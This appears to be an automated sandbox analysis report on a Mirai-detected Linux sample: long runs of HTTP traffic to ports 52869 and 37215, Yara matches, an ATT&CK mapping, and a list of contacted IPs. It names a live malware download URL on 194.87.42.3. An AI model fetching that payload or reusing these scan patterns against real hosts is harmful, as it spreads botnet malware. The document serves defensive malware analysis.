Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43694 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54738 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 54738
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60272 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60278
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45504
Source: unknown	Network traffic detected: HTTP traffic on port 58592 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45514
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37778 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46800 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37778 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46800 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46800
Source: unknown	Network traffic detected: HTTP traffic on port 46808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46800
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46808
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54444 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36956
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36988
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39962 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40286 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57422 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36528 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40286 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46018 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46020 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59968 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36528 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43902 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41286 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 43896
Source: unknown	Network traffic detected: HTTP traffic on port 52840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 43902
Source: unknown	Network traffic detected: HTTP traffic on port 34766 -> 52869

Source: /tmp/BitmCvTrdO (PID: 5233)

Queries kernel information via 'uname':

Source: BitmCvTrdO, 5233.1.00000000bd8599df.00000000fb4ac3d0.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sparc
Source: BitmCvTrdO, 5233.1.00000000bd8599df.00000000fb4ac3d0.rw-.sdmp	Binary or memory string: _nU!/etc/qemu-binfmt/sparc
Source: BitmCvTrdO, 5233.1.0000000066eb4595.000000008745b2f8.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc
Source: BitmCvTrdO, 5233.1.0000000066eb4595.000000008745b2f8.rw-.sdmp	Binary or memory string: _Vx86_64/usr/bin/qemu-sparc/tmp/BitmCvTrdOSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/BitmCvTrdO

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: BitmCvTrdO, type: SAMPLE
Source: Yara match	File source: 5236.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5256.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5235.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5240.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5260.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: BitmCvTrdO, type: SAMPLE
Source: Yara match	File source: 5236.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5256.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5235.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5240.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5260.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
BitmCvTrdO	54%	Virustotal		Browse

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:52869/picdesc.xml	0%	Virustotal		Browse
http://127.0.0.1:52869/picdesc.xml	0%	Avira URL Cloud	safe
http://127.0.0.1:52869/wanipcn.xml	0%	Virustotal		Browse
http://127.0.0.1:52869/wanipcn.xml	0%	Avira URL Cloud	safe
http://194.87.42.3/Anti_Bins/Antisocial.mips	11%	Virustotal		Browse
http://194.87.42.3/Anti_Bins/Antisocial.mips	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:52869/picdesc.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1:52869/wanipcn.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding/	BitmCvTrdO, 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	false		high
http://194.87.42.3/Anti_Bins/Antisocial.mips	BitmCvTrdO, 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, BitmCvTrdO, 5233.1.000000009fa31006.000000000c96b774.rw-.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	BitmCvTrdO, 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.49.104.4	unknown	Iran (ISLAMIC Republic Of)	202391	AFRARASAIR	false
45.150.101.140	unknown	Liechtenstein	47987	LOVESERVERSGB	false
45.12.189.19	unknown	United Kingdom	35085	ACORSOFR	false
185.19.109.165	unknown	United Kingdom	17804	LAODC-AS-APLaoDataCenterLA	false
185.58.180.28	unknown	Slovenia	5603	SIOL-NETTelekomSlovenijeddSI	false
45.124.225.9	unknown	India	9381	HKBNES-AS-APHKBNEnterpriseSolutionsHKLimitedHK	false
204.131.144.153	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
147.249.228.28	unknown	United States	6419	IDDUS	false
162.185.219.137	unknown	United States	21928	T-MOBILE-AS21928US	false
87.107.232.225	unknown	Iran (ISLAMIC Republic Of)	41881	FANAVA-ASFanavaGroupCommunicationCoIR	false
45.109.110.157	unknown	Egypt	37069	MOBINILEG	false
185.110.49.220	unknown	Poland	47544	IQPL-ASPL	false
185.69.33.24	unknown	Netherlands	196826	PL-NETTELEKOM-ASNPL	false
91.105.101.232	unknown	Latvia	12578	APOLLO-ASLatviaLV	false
223.88.173.26	unknown	China	24445	CMNET-V4HENAN-AS-APHenanMobileCommunicationsCoLtdCN	false
197.173.155.52	unknown	South Africa	37168	CELL-CZA	false
41.44.233.246	unknown	Egypt	8452	TE-ASTE-ASEG	false
123.210.9.98	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
185.149.161.25	unknown	Russian Federation	61131	ZONATELECOM-ASRU	false
211.6.134.196	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
211.213.138.11	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
128.167.147.23	unknown	United States	1811	CSC-300-AS1810-AS1815US	false
197.166.142.80	unknown	Egypt	24863	LINKdotNET-ASEG	false
45.117.212.38	unknown	India	45194	SIPL-ASSysconInfowayPvtLtdIN	false
185.187.222.154	unknown	Italy	31543	MYNET-ASmyNETgmbhAT	false
138.246.3.225	unknown	Germany	12816	MWN-ASDE	false
45.221.254.25	unknown	Benin	328092	SUD-TELCOM-ASBJ	false
197.4.54.16	unknown	Tunisia	5438	ATI-TN	false
91.90.227.126	unknown	Latvia	24589	TELENETSIA-ASTelenetAUT-NUMpeeringspecificationobject	false
91.52.65.166	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
45.94.158.140	unknown	Ukraine	56851	VPS-UA-ASUA	false
41.24.86.3	unknown	South Africa	36994	Vodacom-VBZA	false
185.41.19.213	unknown	Norway	199900	ASN-BEDSYSNO	false
91.26.178.48	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
185.69.33.13	unknown	Netherlands	196826	PL-NETTELEKOM-ASNPL	false
202.60.94.153	unknown	Australia	45671	AS45671-NET-AUWholesaleServicesProviderAU	false
45.226.115.240	unknown	Colombia	265861	SISTEMASSATELITALESDECOLOMBIASAESPCO	false
91.11.116.188	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
185.158.165.191	unknown	Netherlands	48635	ASTRALUSNL	false
